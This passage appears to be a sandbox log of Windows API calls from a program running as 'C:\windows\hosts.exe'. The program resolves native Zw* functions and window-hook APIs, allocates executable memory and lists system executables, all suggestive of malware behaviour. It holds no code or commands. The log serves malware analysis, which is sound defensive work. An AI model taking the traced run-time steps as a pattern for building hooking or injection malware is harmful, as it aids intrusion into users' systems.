(dwErrCode=0x0) [0171.411] GetLastError () returned 0x0 [0171.411] SetLastError (dwErrCode=0x0) [0171.411] GetLastError () returned 0x0 [0171.411] SetLastError (dwErrCode=0x0) [0171.411] GetLastError () returned 0x0 [0171.411] SetLastError (dwErrCode=0x0) [0171.411] GetLastError () returned 0x0 [0171.412] SetLastError (dwErrCode=0x0) [0171.412] GetLastError () returned 0x0 [0171.412] SetLastError (dwErrCode=0x0) [0171.412] GetLastError () returned 0x0 [0171.412] SetLastError (dwErrCode=0x0) [0171.412] GetLastError () returned 0x0 [0171.413] SetLastError (dwErrCode=0x0) [0171.413] GetLastError () returned 0x0 [0171.417] SetLastError (dwErrCode=0x0) [0171.417] GetProcAddress (hModule=0x77a60000, lpProcName="ZwClose") returned 0x77a7f9d0 [0171.417] GetLastError () returned 0x0 [0171.418] SetLastError (dwErrCode=0x0) [0171.418] GetLastError () returned 0x0 [0171.418] SetLastError (dwErrCode=0x0) [0171.418] GetLastError () returned 0x0 [0171.418] SetLastError (dwErrCode=0x0) [0171.418] GetLastError () returned 0x0 [0171.418] SetLastError (dwErrCode=0x0) [0171.419] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateFile") returned 0x77a800a4 [0171.419] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenFile") returned 0x77a7fd54 [0171.419] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateSection") returned 0x77a7ff94 [0171.419] GetProcAddress (hModule=0x77a60000, lpProcName="ZwMapViewOfSection") returned 0x77a7fc40 [0171.419] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSection") returned 0x77a7fc70 [0171.420] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x0 [0171.420] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReadFile") returned 0x77a7f8e0 [0171.420] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationFile") returned 0x77a7fa00 [0171.420] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationFile") returned 0x77a7fc28 [0171.420] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryAttributesFile") returned 0x77a7fe4c [0171.420] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySection") returned 0x77a80040 [0171.421] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryFullAttributesFile") returned 0x77a8132c [0171.421] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWriteFile") returned 0x77a7f918 [0171.421] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeviceIoControlFile") returned 0x77a7f8fc [0171.421] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationObject") returned 0x77a80154 [0171.422] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryObject") returned 0x77a7f9e8 [0171.422] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFile") returned 0x77a7fd88 [0171.422] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFileEx") returned 0x0 [0171.422] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenSection") returned 0x77a7fdb8 [0171.422] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDuplicateObject") returned 0x77a7fe34 [0171.423] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteFile") returned 0x77a809d4 [0171.423] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLockFile") returned 0x77a80e44 [0171.423] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnlockFile") returned 0x77a81ea8 [0171.423] GetProcAddress (hModule=0x77a60000, lpProcName="ZwTerminateProcess") returned 0x77a7fca0 [0171.423] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVirtualMemory") returned 0x77a7fbc8 [0171.424] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVolumeInformationFile") returned 0x77a7ff7c [0171.424] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetVolumeInformationFile") returned 0x77a81c8c [0171.424] GetProcAddress (hModule=0x77a60000, lpProcName="ZwAccessCheck") returned 0x77a80218 [0171.424] GetProcAddress (hModule=0x77a60000, lpProcName="ZwExtendSection") returned 0x77a80b0c [0171.424] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushBuffersFile") returned 0x77a7ffac [0171.425] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFsControlFile") returned 0x77a7fde8 [0171.425] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x77a80f48 [0171.425] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySecurityObject") returned 0x77a81518 [0171.425] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetSecurityObject") returned 0x77a81b8c [0171.425] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcess") returned 0x77a80804 [0171.425] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcessEx") returned 0x77a7ffdc [0171.426] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateUserProcess") returned 0x77a8090c [0171.426] GetProcAddress (hModule=0x77a60000, lpProcName="ZwResumeThread") returned 0x77a80058 [0171.426] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateThread") returned 0x77a7fff4 [0171.426] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationProcess") returned 0x77a7fac8 [0171.427] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKey") returned 0x77a7fa18 [0171.427] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKeyEx") returned 0x77a81008 [0171.427] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateValueKey") returned 0x77a7fa30 [0171.427] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryKey") returned 0x77a7fa80 [0171.427] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryValueKey") returned 0x77a7fa98 [0171.428] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateKey") returned 0x77a7fb30 [0171.428] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateKey") returned 0x77a7fd3c [0171.428] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetValueKey") returned 0x77a801b4 [0171.428] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteKey") returned 0x77a809ec [0171.428] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteValueKey") returned 0x77a80a34 [0171.433] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushKey") returned 0x77a80b70 [0171.433] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey") returned 0x77a80dfc [0171.433] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey2") returned 0x77a80e14 [0171.433] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeKey") returned 0x77a80f60 [0171.434] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryMultipleValueKey") returned 0x77a8146c [0171.434] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReplaceKey") returned 0x77a81738 [0171.434] GetProcAddress (hModule=0x77a60000, lpProcName="ZwRestoreKey") returned 0x77a817d0 [0171.434] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSaveKey") returned 0x77a81864 [0171.434] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationKey") returned 0x77a81a48 [0171.434] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnloadKey") returned 0x77a81e60 [0171.435] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForMultipleObjects") returned 0x77a80138 [0171.435] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForSingleObject") returned 0x77a7f8ac [0171.435] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCopyFileChunk") returned 0x0 [0171.435] GetLastError () returned 0x7f [0171.435] SetLastError (dwErrCode=0x7f) [0171.435] GetLastError () returned 0x7f [0171.436] SetLastError (dwErrCode=0x7f) [0171.436] GetLastError () returned 0x7f [0171.436] SetLastError (dwErrCode=0x7f) [0171.436] GetLastError () returned 0x7f [0171.436] SetLastError (dwErrCode=0x7f) [0171.436] VirtualFree (lpAddress=0x340000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0171.436] GetLastError () returned 0x7f [0171.437] SetLastError (dwErrCode=0x7f) [0171.437] GetLastError () returned 0x7f [0171.437] SetLastError (dwErrCode=0x7f) [0171.437] GetLastError () returned 0x7f [0171.437] SetLastError (dwErrCode=0x7f) [0171.437] GetLastError () returned 0x7f [0171.437] SetLastError (dwErrCode=0x7f) [0171.438] SysReAllocStringLen (in: pbstr=0x54e944*=0x0, psz="Registry", len=0x8 | out: pbstr=0x54e944*="Registry") returned 1 [0171.438] SysReAllocStringLen (in: pbstr=0x54e940*=0x0, psz="File", len=0x4 | out: pbstr=0x54e940*="File") returned 1 [0171.438] SysReAllocStringLen (in: pbstr=0x54dd3c*=0x0, psz="tcpsvcs.exe", len=0xb | out: pbstr=0x54dd3c*="tcpsvcs.exe") returned 1 [0171.438] SysReAllocStringLen (in: pbstr=0x54dd38*=0x0, psz="ntvdm.exe", len=0x9 | out: pbstr=0x54dd38*="ntvdm.exe") returned 1 [0171.438] SysReAllocStringLen (in: pbstr=0x54dd34*=0x0, psz="dllhost.exe", len=0xb | out: pbstr=0x54dd34*="dllhost.exe") returned 1 [0171.438] SysReAllocStringLen (in: pbstr=0x54dd30*=0x0, psz="replace.exe", len=0xb | out: pbstr=0x54dd30*="replace.exe") returned 1 [0171.438] SysReAllocStringLen (in: pbstr=0x54dd2c*=0x0, psz="regsvr32.exe", len=0xc | out: pbstr=0x54dd2c*="regsvr32.exe") returned 1 [0171.438] SysReAllocStringLen (in: pbstr=0x54dd28*=0x0, psz="winver.exe", len=0xa | out: pbstr=0x54dd28*="winver.exe") returned 1 [0171.438] SysReAllocStringLen (in: pbstr=0x54dd24*=0x0, psz="help.exe", len=0x8 | out: pbstr=0x54dd24*="help.exe") returned 1 [0171.438] SysReAllocStringLen (in: pbstr=0x54dd20*=0x0, psz="find.exe", len=0x8 | out: pbstr=0x54dd20*="find.exe") returned 1 [0171.438] SysReAllocStringLen (in: pbstr=0x54dd1c*=0x0, psz="compact.exe", len=0xb | out: pbstr=0x54dd1c*="compact.exe") returned 1 [0171.438] SysReAllocStringLen (in: pbstr=0x54dd18*=0x0, psz="chkdsk.exe", len=0xa | out: pbstr=0x54dd18*="chkdsk.exe") returned 1 [0171.439] SysReAllocStringLen (in: pbstr=0x54dd14*=0x0, psz="attrib.exe", len=0xa | out: pbstr=0x54dd14*="attrib.exe") returned 1 [0171.439] SysReAllocStringLen (in: pbstr=0x54dd10*=0x0, psz="write.exe", len=0x9 | out: pbstr=0x54dd10*="write.exe") returned 1 [0171.439] SysReAllocStringLen (in: pbstr=0x54dd0c*=0x0, psz="hh.exe", len=0x6 | out: pbstr=0x54dd0c*="hh.exe") returned 1 [0171.439] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3065226726021) returned 1 [0171.439] GetLastError () returned 0x0 [0171.439] SetLastError (dwErrCode=0x0) [0171.439] GetLastError () returned 0x0 [0171.440] SetLastError (dwErrCode=0x0) [0171.440] GetLastError () returned 0x0 [0171.440] SetLastError (dwErrCode=0x0) [0171.440] GetLastError () returned 0x0 [0171.440] SetLastError (dwErrCode=0x0) [0171.440] GetLastError () returned 0x0 [0171.440] SetLastError (dwErrCode=0x0) [0171.440] GetLastError () returned 0x0 [0171.441] SetLastError (dwErrCode=0x0) [0171.441] GetLastError () returned 0x0 [0171.441] SetLastError (dwErrCode=0x0) [0171.441] GetLastError () returned 0x0 [0171.441] SetLastError (dwErrCode=0x0) [0171.441] GetLastError () returned 0x0 [0171.441] SetLastError (dwErrCode=0x0) [0171.442] GetLastError () returned 0x0 [0171.442] SetLastError (dwErrCode=0x0) [0171.442] GetLastError () returned 0x0 [0171.442] SetLastError (dwErrCode=0x0) [0171.442] GetLastError () returned 0x0 [0171.442] SetLastError (dwErrCode=0x0) [0171.442] GetLastError () returned 0x0 [0171.443] SetLastError (dwErrCode=0x0) [0171.443] GetLastError () returned 0x0 [0171.443] SetLastError (dwErrCode=0x0) [0171.443] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.443] GetLastError () returned 0x0 [0171.443] SetLastError (dwErrCode=0x0) [0171.443] GetLastError () returned 0x0 [0171.444] SetLastError (dwErrCode=0x0) [0171.444] GetLastError () returned 0x0 [0171.454] SetLastError (dwErrCode=0x0) [0171.454] GetLastError () returned 0x0 [0171.454] SetLastError (dwErrCode=0x0) [0171.454] GetLastError () returned 0x0 [0171.454] SetLastError (dwErrCode=0x0) [0171.454] GetLastError () returned 0x0 [0171.454] SetLastError (dwErrCode=0x0) [0171.455] GetLastError () returned 0x0 [0171.455] SetLastError (dwErrCode=0x0) [0171.455] GetLastError () returned 0x0 [0171.455] SetLastError (dwErrCode=0x0) [0171.455] GetLastError () returned 0x0 [0171.455] SetLastError (dwErrCode=0x0) [0171.456] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleHandleA") returned 0x75a91245 [0171.456] GetLastError () returned 0x0 [0171.456] SetLastError (dwErrCode=0x0) [0171.456] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.456] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleHandleW") returned 0x75a93460 [0171.457] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.457] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileA") returned 0x75a9537e [0171.457] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.457] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileW") returned 0x75a93f0c [0171.457] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.457] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileMappingA") returned 0x75a954be [0171.458] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.458] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileMappingW") returned 0x75a918e9 [0171.458] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.458] GetProcAddress (hModule=0x75a80000, lpProcName="ReadFile") returned 0x75a93e83 [0171.458] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.459] GetProcAddress (hModule=0x75a80000, lpProcName="CloseHandle") returned 0x75a913f0 [0171.459] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.459] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileSize") returned 0x75a9194e [0171.459] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.459] GetProcAddress (hModule=0x75a80000, lpProcName="SetFilePointer") returned 0x75a917b1 [0171.459] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.467] GetProcAddress (hModule=0x75a80000, lpProcName="MapViewOfFile") returned 0x75a918d1 [0171.467] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.467] GetProcAddress (hModule=0x75a80000, lpProcName="MapViewOfFileEx") returned 0x75a94c3b [0171.468] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.468] GetProcAddress (hModule=0x75a80000, lpProcName="UnmapViewOfFile") returned 0x75a91806 [0171.468] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.468] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryA") returned 0x75a9498f [0171.468] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.468] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryExA") returned 0x75a948cb [0171.469] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.469] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryW") returned 0x75a948e3 [0171.469] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.469] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryExW") returned 0x75a94915 [0171.469] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.469] GetProcAddress (hModule=0x75a80000, lpProcName="FreeLibrary") returned 0x75a93478 [0171.470] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.470] GetProcAddress (hModule=0x75a80000, lpProcName="FreeResource") returned 0x75aad3ab [0171.470] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.470] GetProcAddress (hModule=0x75a80000, lpProcName="GetVersion") returned 0x75a9441f [0171.470] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.470] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentProcessId") returned 0x75a911f8 [0171.471] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.471] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentProcess") returned 0x75a917e9 [0171.471] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.471] GetProcAddress (hModule=0x75a80000, lpProcName="GetCommandLineA") returned 0x75a95159 [0171.471] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.471] GetProcAddress (hModule=0x75a80000, lpProcName="GetCommandLineW") returned 0x75a951db [0171.472] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.472] GetProcAddress (hModule=0x75a80000, lpProcName="LockResource") returned 0x75a95911 [0171.472] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.472] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0171.472] GetLastError () returned 0x0 [0171.473] SetLastError (dwErrCode=0x0) [0171.473] GetLastError () returned 0x0 [0171.473] SetLastError (dwErrCode=0x0) [0171.473] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.473] GetLastError () returned 0x0 [0171.473] SetLastError (dwErrCode=0x0) [0171.473] GetLastError () returned 0x0 [0171.474] SetLastError (dwErrCode=0x0) [0171.474] GetLastError () returned 0x0 [0171.474] SetLastError (dwErrCode=0x0) [0171.474] GetLastError () returned 0x0 [0171.474] SetLastError (dwErrCode=0x0) [0171.474] GetLastError () returned 0x0 [0171.474] SetLastError (dwErrCode=0x0) [0171.475] GetProcAddress (hModule=0x75a80000, lpProcName="UnhandledExceptionFilter") returned 0x75ab76f7 [0171.475] GetLastError () returned 0x0 [0171.475] SetLastError (dwErrCode=0x0) [0171.475] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.480] GetProcAddress (hModule=0x75a80000, lpProcName="DebugBreak") returned 0x75b14755 [0171.480] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.480] GetProcAddress (hModule=0x75a80000, lpProcName="FatalAppExitA") returned 0x75b14c31 [0171.480] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.480] GetProcAddress (hModule=0x75a80000, lpProcName="RtlRaiseException") returned 0x0 [0171.480] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0171.481] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowsHookExA") returned 0x759a835c [0171.481] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0171.481] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowsHookExW") returned 0x759a7603 [0171.481] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0171.481] GetProcAddress (hModule=0x75980000, lpProcName="UnhookWindowsHookEx") returned 0x759bf52b [0171.482] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0171.482] GetProcAddress (hModule=0x75980000, lpProcName="PeekMessageA") returned 0x759a5f74 [0171.482] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0171.482] GetProcAddress (hModule=0x75980000, lpProcName="CallNextHookEx") returned 0x759a6285 [0171.482] GetLastError () returned 0x7f [0171.482] SetLastError (dwErrCode=0x7f) [0171.483] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x3760000 [0171.488] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x3760590 [0171.488] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x3770598 [0171.489] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x37805a0 [0171.489] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x37905a8 [0171.489] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x37a05b0 [0171.489] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x37b05b8 [0171.489] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x37c05c0 [0171.489] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x37d05c8 [0171.490] GetLastError () returned 0x7f [0171.490] SetLastError (dwErrCode=0x7f) [0171.490] GetLastError () returned 0x7f [0171.490] SetLastError (dwErrCode=0x7f) [0171.490] GetLastError () returned 0x7f [0171.490] SetLastError (dwErrCode=0x7f) [0171.491] VirtualAlloc (lpAddress=0x33e4000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x33e4000 [0171.503] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.503] GetProcAddress (hModule=0x75a80000, lpProcName="GetVersionExA") returned 0x75a934c9 [0171.504] GetVersionExA (in: lpVersionInformation=0x28fc5c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x28fc78, dwMinorVersion=0x4, dwBuildNumber=0x42ed7e, dwPlatformId=0x28fca0, szCSDVersion="") | out: lpVersionInformation=0x28fc5c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0171.504] VirtualAlloc (lpAddress=0x33f4000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0x33f4000 [0171.511] GetSystemDirectoryW (in: lpBuffer=0x33f1c98, uSize=0xfffe | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0171.511] SysReAllocStringLen (in: pbstr=0x28fdcc*=0x0, psz="C:\\Windows\\system32", len=0x13 | out: pbstr=0x28fdcc*="C:\\Windows\\system32") returned 1 [0171.511] SysReAllocStringLen (in: pbstr=0x28fdd0*=0x0, psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x28fdd0*="C:\\Windows\\system32\\") returned 1 [0171.512] GetThreadLocale () returned 0x409 [0171.512] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.512] GetThreadLocale () returned 0x409 [0171.512] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Windows\\system32\\", lpFilePart=0x28fa90*=0x0) returned 0x14 [0171.512] SysReAllocStringLen (in: pbstr=0x28fdd0*="C:\\Windows\\system32\\", psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x28fdd0*="C:\\Windows\\system32\\") returned 1 [0171.513] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x28fcc0*="C:\\Windows\\system32\\") returned 1 [0171.513] CharLowerBuffW (in: lpsz="C:\\Windows\\system32\\", cchLength=0x14 | out: lpsz="c:\\windows\\system32\\") returned 0x14 [0171.513] SysReAllocStringLen (in: pbstr=0x28fdd0*="C:\\Windows\\system32\\", psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0x28fdd0*="c:\\windows\\system32\\") returned 1 [0171.513] SysReAllocStringLen (in: pbstr=0x33e25b4*=0x0, psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0x33e25b4*="c:\\windows\\system32\\") returned 1 [0171.513] GetWindowsDirectoryW (in: lpBuffer=0x33f1c98, uSize=0xfffe | out: lpBuffer="C:\\Windows") returned 0xa [0171.514] SysReAllocStringLen (in: pbstr=0x28fdc0*=0x0, psz="C:\\Windows", len=0xa | out: pbstr=0x28fdc0*="C:\\Windows") returned 1 [0171.514] SysReAllocStringLen (in: pbstr=0x28fdc4*=0x0, psz="C:\\Windows\\", len=0xb | out: pbstr=0x28fdc4*="C:\\Windows\\") returned 1 [0171.514] GetThreadLocale () returned 0x409 [0171.514] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.514] GetThreadLocale () returned 0x409 [0171.514] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Windows\\", lpFilePart=0x28fa90*=0x0) returned 0xb [0171.514] SysReAllocStringLen (in: pbstr=0x28fdc4*="C:\\Windows\\", psz="C:\\Windows\\", len=0xb | out: pbstr=0x28fdc4*="C:\\Windows\\") returned 1 [0171.515] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Windows\\", len=0xb | out: pbstr=0x28fcc0*="C:\\Windows\\") returned 1 [0171.515] CharLowerBuffW (in: lpsz="C:\\Windows\\", cchLength=0xb | out: lpsz="c:\\windows\\") returned 0xb [0171.515] SysReAllocStringLen (in: pbstr=0x28fdc4*="C:\\Windows\\", psz="c:\\windows\\", len=0xb | out: pbstr=0x28fdc4*="c:\\windows\\") returned 1 [0171.515] SysReAllocStringLen (in: pbstr=0x33e25b0*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0x33e25b0*="c:\\windows\\") returned 1 [0171.515] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x10eba04, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0171.516] CharLowerBuffW (in: lpsz="C:\\windows\\hosts.exe", cchLength=0x14 | out: lpsz="c:\\windows\\hosts.exe") returned 0x14 [0171.516] GetFullPathNameW (in: lpFileName="C:\\windows\\hosts.exe", nBufferLength=0x104, lpBuffer=0x28fae4, lpFilePart=0x28fae0 | out: lpBuffer="C:\\windows\\hosts.exe", lpFilePart=0x28fae0*="hosts.exe") returned 0x14 [0171.516] SysReAllocStringLen (in: pbstr=0x33e25a8*=0x0, psz="C:\\windows\\hosts.exe", len=0x14 | out: pbstr=0x33e25a8*="C:\\windows\\hosts.exe") returned 1 [0171.516] SysReAllocStringLen (in: pbstr=0x28fdb0*=0x0, psz="C:\\windows\\hosts.exe", len=0x14 | out: pbstr=0x28fdb0*="C:\\windows\\hosts.exe") returned 1 [0171.516] GetThreadLocale () returned 0x409 [0171.516] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\windows\\hosts.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.517] GetThreadLocale () returned 0x409 [0171.517] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\windows\\hosts.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.517] GetFullPathNameW (in: lpFileName="C:\\windows\\hosts.exe", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\windows\\hosts.exe", lpFilePart=0x28fa90*="hosts.exe") returned 0x14 [0171.517] SysReAllocStringLen (in: pbstr=0x28fdb0*="C:\\windows\\hosts.exe", psz="C:\\windows\\hosts.exe", len=0x14 | out: pbstr=0x28fdb0*="C:\\windows\\hosts.exe") returned 1 [0171.517] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\windows\\hosts.exe", len=0x14 | out: pbstr=0x28fcc0*="C:\\windows\\hosts.exe") returned 1 [0171.518] CharLowerBuffW (in: lpsz="C:\\windows\\hosts.exe", cchLength=0x14 | out: lpsz="c:\\windows\\hosts.exe") returned 0x14 [0171.518] SysReAllocStringLen (in: pbstr=0x28fdb0*="C:\\windows\\hosts.exe", psz="c:\\windows\\hosts.exe", len=0x14 | out: pbstr=0x28fdb0*="c:\\windows\\hosts.exe") returned 1 [0171.518] SysReAllocStringLen (in: pbstr=0x33e25a8*="C:\\windows\\hosts.exe", psz="c:\\windows\\hosts.exe", len=0x14 | out: pbstr=0x33e25a8*="c:\\windows\\hosts.exe") returned 1 [0171.518] SysReAllocStringLen (in: pbstr=0x33e25b8*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0x33e25b8*="c:\\windows\\") returned 1 [0171.518] SysReAllocStringLen (in: pbstr=0x28fda4*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0x28fda4*="c:\\windows\\") returned 1 [0171.518] SysReAllocStringLen (in: pbstr=0x28fda8*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0x28fda8*="c:\\windows\\") returned 1 [0171.518] GetThreadLocale () returned 0x409 [0171.519] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\windows\\", cchCount1=4, 